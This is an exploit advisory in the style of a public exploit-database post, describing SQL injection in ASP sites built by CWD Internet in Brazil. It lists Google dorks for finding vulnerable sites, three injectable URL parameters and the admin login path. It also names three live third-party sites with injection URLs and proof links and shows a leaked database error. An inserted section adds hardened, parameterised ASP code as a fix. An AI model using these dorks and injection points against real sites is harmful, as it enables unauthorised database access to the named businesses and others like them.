#################################################################################################
# Exploit Title : Desenvolvido e Hospedado por CWD Internet Brazil SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Date : 05/06/2018
# Vendor Homepage : cwd.com.br
# Tested On : Windows / Kali Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89
#################################################################################################
# Title : Copyright © CWD Internet 2012, Todos os direitos reservados - Uma empresa do Grupo Controlp.Com.Br Web Solution Systems
# Google Dork 1 : intext:''Desenvolvido e Hospedado por CWD Internet''
# Google Dork 2 : inurl:''/news.asp?tipo=T&offset=''
# Exploit : /news.asp?tipo=T&offset=[SQL Injection]
# Exploit : /produto_vitrine.asp?fabricante=[SQL Injection]
# Exploit : /produto_vitrine.asp?categoria=[SQL Injection]
# Admin Login Path => /restrito.asp
#################################################################################################
# Example Site => sanseicomercial.com.br/produto_vitrine.asp?categoria=53%27 => [ Proof of Concept ] => archive.is/T1Wwq
# Example Site => rotaxmotoclube.org.br/news.asp?tipo=1%27 => [ Proof of Concept ] => archive.is/ijSQJ
# Example Site => 7lobos.com.br/produto_vitrine.asp?fabricante=194%27 => [ Proof of Concept ] => archive.is/Odbkf
# SQL-DB Error =>
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'produtos.fabricante = fornecedor.cod and produtos.categoria =
categoria.cod and produtos.categoria = 53' order by fornecedor.fabricante'.
/produto_vitrine.asp, line 52
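
The JET error above shows the categoria value being concatenated straight into the query text. A hardened form of that lookup for classic ASP, which validates the value and binds it as an integer parameter, is given here as an added example, not the vendor's code. The table and column names are taken from the error message; the SELECT list, connString and the 400 response are assumptions.

```asp
<%
' Added example, not the vendor's code. Table and column names in the WHERE
' clause come from the JET error above; the SELECT list, connString and the
' 400 response are assumptions.
Const adInteger = 3
Const adParamInput = 1
Const adCmdText = 1

Function ReadId(name)
    ' Accept 1 to 9 decimal digits only; anything else returns -1.
    Dim raw, re
    raw = Trim(Request.QueryString(name) & "")
    Set re = New RegExp
    re.Pattern = "^[0-9]{1,9}$"
    If re.Test(raw) Then ReadId = CLng(raw) Else ReadId = -1
End Function

Dim categoria, conn, cmd, rs
categoria = ReadId("categoria")
If categoria < 0 Then
    ' Reject instead of passing the raw value on to the database engine.
    Response.Status = "400 Bad Request"
    Response.End
End If

' Weak form implied by the error text (value concatenated into the SQL string):
'   sql = "... and produtos.categoria = " & Request.QueryString("categoria") & " order by ..."

Set conn = Server.CreateObject("ADODB.Connection")
conn.Open connString   ' assumed to be defined elsewhere
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
' The ? placeholder keeps the value out of the SQL text entirely.
cmd.CommandText = "SELECT produtos.* FROM produtos, fornecedor, categoria " & _
    "WHERE produtos.fabricante = fornecedor.cod " & _
    "AND produtos.categoria = categoria.cod " & _
    "AND produtos.categoria = ? " & _
    "ORDER BY fornecedor.fabricante"
cmd.Parameters.Append cmd.CreateParameter("categoria", adInteger, adParamInput, , categoria)
Set rs = cmd.Execute
%>
```

The same validate-then-bind pattern applies to the fabricante and offset parameters listed above.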
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################